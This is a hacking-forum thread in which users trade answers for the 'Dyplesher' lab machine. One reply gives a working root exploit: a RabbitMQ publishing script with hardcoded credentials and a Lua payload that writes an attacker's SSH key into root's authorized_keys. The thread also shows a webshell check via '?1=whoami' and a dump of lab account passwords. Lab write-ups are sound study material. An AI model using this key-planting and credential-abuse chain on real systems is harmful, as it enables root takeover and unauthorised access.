TRADING [ASK]Dyplesher WriteUp
by user1337 - June 12, 2020 at 07:33 PM
#1
Halo...
Someone have free Dyplesher WriteUp or Hash..?
At this forum i have one free but the WriteUp its not clear to explain to me.

Thanks...
#2
Where do you stuck? Let me help you.
#3
(June 13, 2020 at 09:29 AM)Un1k0d3r Wrote: Where do you stuck? Let me help you.

Thank you for your helping offer. 
I'm stuck in plugin development step. 

Actually I hate java and don't like to install the whole stack to only create a plugin. So if you kindly give me the final code/plugin I'll appreciate it more ;)
#4
(June 13, 2020 at 09:29 AM)Un1k0d3r Wrote: Where do you stuck? Let me help you.

Oke bro,

Now i'm on MinatoTW machine, and i'm try to create some lua plugin but i not understand where the lua plugin must be create? on the target machine or attacker machine?

i'm create the plugin on Minato machine but i'have not permision because the path of lua plugin is /root/..xxx/xxx_xxxx
#5
anyone have MinatoTW or yuntao password?
#6
have some freebies :P



(June 13, 2020 at 11:13 AM)thazurt Wrote: I'm stuck in plugin development step. 


Actually I hate java and don't like to install the whole stack to only create a plugin. So if you kindly give me the final code/plugin I'll appreciate it more ;)


upload this, start the exploit "EXPLOIT" and check test.dyplesher.htb/?1=whoami


(June 13, 2020 at 12:12 PM)user1337 Wrote: Oke bro,



Now i'm on MinatoTW machine, and i'm try to create some lua plugin but i not understand where the lua plugin must be create? on the target machine or attacker machine?



i'm create the plugin on Minato machine but i'have not permision because the path of lua plugin is /root/..xxx/xxx_xxxx

Spoiler
you have to send a request to the rabbitmq and tell it where to get the lua file from. you have to send it a link, i set a localhost link and started a little web server on the server to read the lua file. here's the script.


import pika
credentials = pika.PlainCredentials("yuntao","EashAnicOc3Op")
parameters = pika.ConnectionParameters('10.10.10.190',5672,'/',credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
# channel.queue_declare(queue="plugin_data", durable=True, exclusive=False, auto_delete=False)
channel.confirm_delivery()
while True:
        channel.basic_publish(exchange='',
                      routing_key='plugin_data',
                      body="http://127.0.0.1:8000/script.lua",
                      properties=pika.BasicProperties(content_type='text/plain',
                      delivery_mode=1),
                      mandatory=True)

and serve this script.lua with your public key in it

local f=io.open("/home/root/.ssh/authorized_keys", "wb");
f:write("YOUR KEY HERE");
io.close(f);

and just ssh in as root


(June 13, 2020 at 04:13 PM)0x2019 Wrote: anyone have MinatoTW or yuntao password?

Spoiler
{"name":"MinatoTW","email":"[email protected]","address":"India","password":"bihys1amFov","subscribed":true}
{"name":"yuntao","email":"[email protected]","address":"Italy","password":"wagthAw4ob","subscribed":true}
{"name":"felamos","email":"[email protected]","address":"India","password":"tieb0graQueg","subscribed":true}
#7
(June 13, 2020 at 09:29 AM)Un1k0d3r Wrote: Where do you stuck? Let me help you.
i need some help can u help me in PM??!
#8
dyplesher detailed writeup and password

https://kali-education.info/dyplesher/

pass: 03982d9919b3b35a81c80c47aadaf61b
#9
(June 15, 2020 at 10:24 AM)tester_soldier Wrote: dyplesher detailed writeup and password

https://kali-education.info/dyplesher/

pass: 03982d9919b3b35a81c80c47aadaf61b

Good one writeup, very clear for learn....

Possibly Related Threads…
Thread Author Replies Views Last Post
SELLING Prolabs Writeup WIth Flags and eCCPT writeup dory23 2 301 January 08, 2021 at 11:46 PM
Last Post: 88bh2fx
TRADING Anyone trade antidote writeup/flag for any other challenge flag/writeup? Iknowitsme 0 343 November 28, 2020 at 04:16 AM
Last Post: Iknowitsme
TUTORIAL HackTheBox: Dyplesher [INSANE] Root Hash + Writeup Link anrbn2 8 2,069 October 20, 2020 at 11:02 AM
Last Post: atomman

 Users browsing this thread: 1 Guest(s)